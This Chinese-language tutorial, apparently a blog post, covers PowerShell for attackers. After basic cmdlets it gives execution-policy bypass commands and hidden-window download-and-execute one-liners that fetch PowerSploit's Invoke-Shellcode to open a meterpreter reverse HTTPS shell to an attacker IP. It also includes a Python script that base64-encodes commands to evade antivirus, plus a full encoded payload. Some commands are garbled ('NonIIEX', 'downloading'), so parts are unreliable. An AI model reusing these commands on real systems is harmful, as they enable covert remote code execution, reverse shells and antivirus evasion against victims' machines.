文章目录
powershell是windows的一种命令行外壳程序。只要一台计算机上可以运行代码,就可以将powershell脚本文件执行,甚至无需写入到磁盘中。powershell拥有以下几个重要的特点:
- 脚本可以在内存中运行,不需要写入到磁盘中。
- 可以远程执行。
- 可用于管理活动目录。
使用以下命令,可以查看powershell的版本和进入powershell命令行:
powershell
Get-host
$PSVersionTable.PSVERSION
1.基本概念
1.1 .ps1文件
.ps1文件是powershell脚本文件的拓展名。其中包含一系列Powershell命令,每个命令显示为独立的一行。
1.2 执行策略
为了防止运行恶意脚本,powershell在默认情况下,这个执行策略被设置为“不能运行”。执行下面的cmdlet命令查询当前的执行策略:
Get-ExecutionPolicy
)
执行策略有下面几种类型:
- Restricted:脚本不能运行(默认设置)。
- RemoteSigned:在本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)
- AllSigned:仅当脚本由受信任的发布者签名时才能运行。
- Unrestricted:允许当前所有脚本执行。
可以执行下面的命令设置执行策略:
Set-ExecutionPolicy <policy-name>
1.3 管道
管道的作用是将一个命令的输出作为另外一个命令的输入,两个命令之间用‘’|‘’连接。如下面一个例子,让所有运行的、名字以字符“p”开头的程序停止运行。
get-process p* | stop-process
2.常用命令
2.1 文件操作命令
基础命令基本兼容shell Linux,下面是文件操作常用命令:
New-Item vuln -ItemType Directory 新建目录
New-Item 1.txt -ItemType File 新建文件
Remove-Item .\while\ 删除目录
Get-Content .\1.txt 显示文本内容
Set-Content .\1.txt -Value "hello world!" 设置文本内容
Add-Content .\1.txt -Value "i love you" 追加文本内容,换行追加
Clear-Content .\1.txt 清除文本内容
2.2 绕过本地权限并执行
- 将1.ps1上传至目标服务器。在命令行环境下,执行如下命令,绕过安全策略,在目标服务器本地执行该脚本文件。
powershell.exe -ExecutionPolicy Bypass -File 1.ps1
- 将同一个脚本上传到服务器中,在目标本地执行脚本文件,命令如下:
powershell.exe exec bypass -Command "& {Import-Module 1.ps1;Invoke-AllChecks}"
- 从服务器上下载脚本,绕过本地权限并隐藏执行
powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-Object Net.WebClient).DownloadString("http://192.168.1.1/Payload.ps1");[payload的参数]
- https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke–Shellcode.ps1这个脚本可以在目标机器上执行meterpreter shell执行的代码如下:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonIIEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1");Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80
下面是常用参数的说明:
- ExecutionPolicy Bypass(-exe bypass):绕过安全策略。
- WindowStyle Hidden(-W Hidden):隐藏窗口
- NonInteractive(-NonI):非交互模式。Powershell不为用户提供交互式的提示。
- -NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。
- -noexit:执行后不退出Shell。
- -NoLogo:启动不显示版权的Powershell。
2.3 使用base64对PowerShell命令进行编码
这样做的目的是混淆和压缩代码,从而避免脚本因为一些特殊字符被杀毒软件查杀。使用python脚本对所有powershell命令进行编码。Python脚本如下:
#!/usr/bin/env python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import sys
import re
import os
import getopt
def powershell_encode(data):
# blank command will store our fixed unicode variable
blank_command = ""
powershell_command = ""
# Remove weird chars that could have been added by ISE
n = re.compile(u'(\xef|\xbb|\xbf)')
# loop through each character and insert null byte
for char in (n.sub("", data)):
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command.encode())
return powershell_command.decode("utf-8")
def usage():
print("Version: {0}".format(__version__))
print("Usage: {0} <options>\n".format(sys.argv[0]))
print("Options:")
print(" -h, --help Show this help message and exit")
print(" -s, --script <script> PowerShell Script.")
sys.exit(0)
def main():
try:
options, args = getopt.getopt(sys.argv[1:], 'hs:', ['help', 'script='])
except getopt.GetoptError:
print("Wrong Option Provided!")
usage()
if len(sys.argv) == 1:
usage()
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-s', '--script'):
script_file = arg
if not os.path.isfile(script_file):
print("The specified powershell script does not exists")
sys.exit(1)
else:
ps_script = open(script_file, 'r',encoding='latin1').read()
print(powershell_encode(ps_script))
if __name__ == "__main__":
main()
首先将powershell命令转换成文件命令如下:
echo "IEX(New-object Net.webClient).downloading('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1');Invoke-Shellcode-Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80 -Force" > raw.txt
使用脚本进行编码:
在远控主机上执行如下命令:
powershell.exe -Nop -NonI -w hidden -exec bypass -enc w78Aw74ASQAAAEUAAABYAAAAKAAAAE4AAABlAAAAdwAAAC0AAABvAAAAYgAAAGoAAABlAAAAYwAAAHQAAAAgAAAATgAAAGUAAAB0AAAALgAAAHcAAABlAAAAYgAAAEMAAABsAAAAaQAAAGUAAABuAAAAdAAAACkAAAAuAAAAZAAAAG8AAAB3AAAAbgAAAGwAAABvAAAAYQAAAGQAAABpAAAAbgAAAGcAAAAoAAAAJwAAAGgAAAB0AAAAdAAAAHAAAABzAAAAOgAAAC8AAAAvAAAAcgAAAGEAAAB3AAAALgAAAGcAAABpAAAAdAAAAGgAAAB1AAAAYgAAAHUAAABzAAAAZQAAAHIAAABjAAAAbwAAAG4AAAB0AAAAZQAAAG4AAAB0AAAALgAAAGMAAABvAAAAbQAAAC8AAABjAAAAaAAAAGUAAABlAAAAdAAAAHoAAAAvAAAAUAAAAG8AAAB3AAAAZQAAAHIAAABTAAAAcAAAAGwAAABvAAAAaQAAAHQAAAAvAAAAbQAAAGEAAABzAAAAdAAAAGUAAAByAAAALwAAAEMAAABvAAAAZAAAAGUAAABFAAAAeAAAAGUAAABjAAAAdQAAAHQAAABpAAAAbwAAAG4AAAAvAAAASQAAAG4AAAB2AAAAbwAAAGsAAABlAAAALQAAAC0AAABTAAAAaAAAAGUAAABsAAAAbAAAAGMAAABvAAAAZAAAAGUAAAAuAAAAcAAAAHMAAAAxAAAAJwAAACkAAAA7AAAASQAAAG4AAAB2AAAAbwAAAGsAAABlAAAALQAAAFMAAABoAAAAZQAAAGwAAABsAAAAYwAAAG8AAABkAAAAZQAAAC0AAABQAAAAYQAAAHkAAABsAAAAbwAAAGEAAABkAAAAIAAAAHcAAABpAAAAbgAAAGQAAABvAAAAdwAAAHMAAAAvAAAAbQAAAGUAAAB0AAAAZQAAAHIAAABwAAAAcgAAAGUAAAB0AAAAZQAAAHIAAAAvAAAAcgAAAGUAAAB2AAAAZQAAAHIAAABzAAAAZQAAAF8AAABoAAAAdAAAAHQAAABwAAAAcwAAACAAAAAtAAAATAAAAGgAAABvAAAAcwAAAHQAAAAgAAAAMQAAADkAAAAyAAAALgAAADEAAAA2AAAAOAAAAC4AAAAzAAAAMAAAAC4AAAAxAAAAMgAAADkAAAAgAAAALQAAAEwAAABwAAAAbwAAAHIAAAB0AAAAIAAAADgAAAAwAAAAIAAAAC0AAABGAAAAbwAAAHIAAABjAAAAZQAAAAoAAAAKAAAA
2.3 运行32位和64位powershell
powershell.exe -NoP -NonI -w Hidden -Exec Bypass 运行32位powershell脚本
%winDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W hidden -exec bypass 运行64位powershell脚本
这是一个powershell在线学习教程https://www.pstips.net/powershell-online-tutorials。